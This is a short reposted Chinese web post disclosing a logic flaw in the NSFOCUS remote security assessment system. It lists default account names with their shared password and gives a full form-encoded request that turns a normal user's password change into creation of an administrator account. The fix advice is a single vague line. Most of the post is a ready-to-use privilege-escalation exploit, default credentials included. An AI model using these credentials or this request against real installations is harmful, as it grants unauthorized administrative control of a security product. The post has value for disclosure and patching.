默认2个帐号:reporter,auditor密码是nsfocus。 用普通帐号登陆,修改密码处,
user%5Baccount%5D=admin&user%5Bname%5D=Admin&user%5Bpassword%5D=admin123&user%5Bpassword.confirm%5D=admin123&user%5Bmail%5D=admin%40example.com&user%5Broles%5D=ADMINISTRATORS&user%5BallowLoginIp%5D=*.*.*.*&user%5BallowScanIp%5D=*.*.*.*&user%5BmaxTask%5D=1501 处修改ADMINISTRATORS 2 处修改 帐号 admin 就可以了。 最后即可admin登陆。
修复方案:程序开发 人员修改下。加上码。
查看更多关于绿盟远程安全评估系统逻辑漏洞直接进入管理通的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did15445